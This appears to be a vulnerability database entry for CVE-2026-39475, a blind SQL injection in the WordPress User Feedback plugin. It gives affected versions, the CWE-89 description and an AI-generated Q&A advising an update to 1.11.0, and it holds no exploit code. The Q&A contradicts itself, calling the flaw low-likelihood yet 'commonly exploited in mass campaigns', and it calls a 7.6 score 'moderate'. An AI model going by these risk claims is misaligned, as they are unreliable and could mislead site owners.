CVE-2026-39475
Blind SQL Injection in Syed Balkhi User Feedback Plugin
Publication date: 2026-04-08
Last updated on: 2026-04-29
Assigner: Patchstack
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| syed_balkhi | user_feedback | to 1.10.1 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The SQL Injection vulnerability in the User Feedback plugin allows unauthorized database interaction, which can lead to data theft or manipulation.
Such unauthorized access and potential data breaches can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information.
Failure to address this vulnerability could result in exposure of protected data, leading to regulatory non-compliance and possible legal or financial consequences.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability allows a malicious actor with at least editor or developer privileges to interact with the plugin's database via SQL Injection. Detection typically involves monitoring for unusual database queries or unauthorized access attempts related to the User Feedback plugin.
Specific commands or detection methods are not provided in the available resources.
Can you explain this vulnerability to me?
CVE-2026-39475 is an SQL Injection vulnerability found in the WordPress User Feedback Plugin (userfeedback-lite) versions up to and including 1.10.1.
This vulnerability allows a malicious actor with at least editor or developer privileges to perform Blind SQL Injection attacks, which means they can manipulate or extract data from the plugin's database without direct visibility of the data returned.
The issue arises from improper neutralization of special elements used in SQL commands, enabling attackers to inject malicious SQL code.
How can this vulnerability impact me? :
This vulnerability can allow attackers with certain privileges to interact directly with the plugin's database.
- Potential data theft from the database.
- Manipulation or corruption of stored data.
Although the vulnerability has a CVSS score of 7.6 indicating moderate risk, it is considered low priority by Patchstack due to limited impact and lower likelihood of exploitation.
However, it is commonly exploited in mass campaigns targeting many websites, so immediate patching is recommended to prevent database compromise.
What immediate steps should I take to mitigate this vulnerability?
The immediate recommended step to mitigate this vulnerability is to update the WordPress User Feedback Plugin to version 1.11.0 or later, where the issue has been patched.
Using automated update tools provided by Patchstack can help rapidly protect vulnerable plugins.
Taking these steps will prevent potential database compromise caused by this SQL Injection vulnerability.